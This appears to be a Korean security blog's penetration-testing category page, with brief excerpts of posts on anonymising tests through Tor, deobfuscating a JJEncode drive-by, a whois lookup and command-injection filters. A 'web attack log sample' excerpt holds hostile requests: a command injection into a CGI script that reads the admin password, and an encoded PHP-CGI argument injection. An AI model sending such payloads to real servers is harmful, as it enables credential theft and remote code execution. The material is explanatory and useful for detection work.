모의해킹158 728x90 Tor-nonymous - Using Tor for Pen Testing [Editor's Note: In this article, Chris Crowley provides some really useful tips for using Tor to anonymize your penetration testing. He provides details on strategy and tactics, along with some helpful configuration settings and scripts. His discussion of Privoxy is especially useful. Thanks, Chris! --Ed.]By Chris CrowleyPen testing derives its value from being able to emulate the behavior of re.. 2014. 4. 30. JJEncode Script Leads to Drive-By The use of JJEncode in a drive-by download has been around for a couple of years but has been popping up a lot recently. A couple of readers have asked how to deobfuscate this so here’s a walkthrough with a live script.Here’s an automobile forum that’s been compromised:Viewing the source code, this link kicks off the infection:Then from alnera.eu, you end up getting this strange looking Javascri.. 2014. 4. 8. 웹사이트 침해시도 탐지코드 아이피 : 65.185.5.104organization:Class-Name:organizationorganization:ID:NETBLK-ISRR-65.185.0.0-17organization:Auth-Area:65.185.0.0/17organization:Org-Name:Road Runnerorganization:Tech-Contact:ipaddreg@rr.comorganization:Street-Address:13820 Sunrise Valley Driveorganization:City:Herndonorganization:State:VAorganization:Postal-Code:20171organization:Country-Code:USorganization:Phone:703-345-3151orga.. 2014. 3. 7. Command Injection Filters - Web Hacking Web Application Pentesting 2014. 1. 13. web attack log sample GET /cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount HTTP/1.1 POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6.. 2014. 1. 10. 이전 1 2 3 4 5 6 ··· 32 다음 728x90 728x90